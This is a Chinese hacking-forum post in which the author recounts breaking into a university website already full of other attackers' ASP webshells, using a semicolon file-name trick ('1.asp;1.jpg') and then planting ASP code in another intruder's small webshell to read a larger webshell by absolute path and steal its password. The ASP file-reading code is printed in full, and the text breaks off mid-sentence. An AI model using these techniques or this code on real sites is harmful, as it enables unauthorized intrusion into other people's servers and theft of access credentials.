找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1468|回复: 0

螳螂捕蝉黄雀在

[复制链接]

120

主题

-9

回帖

478

牛毛

一级牛人

积分
478
发表于 2015-9-23 15:45:12 | 显示全部楼层 |阅读模式 来自 广东省中山市
某某大学网站upfile中有很多asp木马,大马都带密码,突然看见一个小马,1.asp;1.jpg我就把自己的大马上传上去了,可是一打开却是404错误,文件怎么会不存在呢?
原来是我的大马不免杀,被杀毒软件杀了,看见别人的木马没被杀就想了一个办法,
后来我再小马中写入代码:
<%Set fso = CreateObject("Scripting.FileSystemObject")
Set txt = fso.OpenTextFile("D:\app\ipv6\网站\upload\uploadfiles\knickers.asp",1)
do While Not txt.AtEndOfStream
tmp=tmp&txt.ReadLine
loop
response.write tmp
txt.close
set fso=nothing
geturl=tmp
%>
会asp的人都能看懂上面的代码,读取knickers.asp文件,D:\app\ipv6\网站\upload\uploadfiles\knickers.asp是别人的大马的绝对路径,这代码会保存成一个read.asp文件,我打开read.asp文件,看见了大马的代码,并且看见了大马的密码。于是
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2024-12-22 20:03 , Processed in 0.119387 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表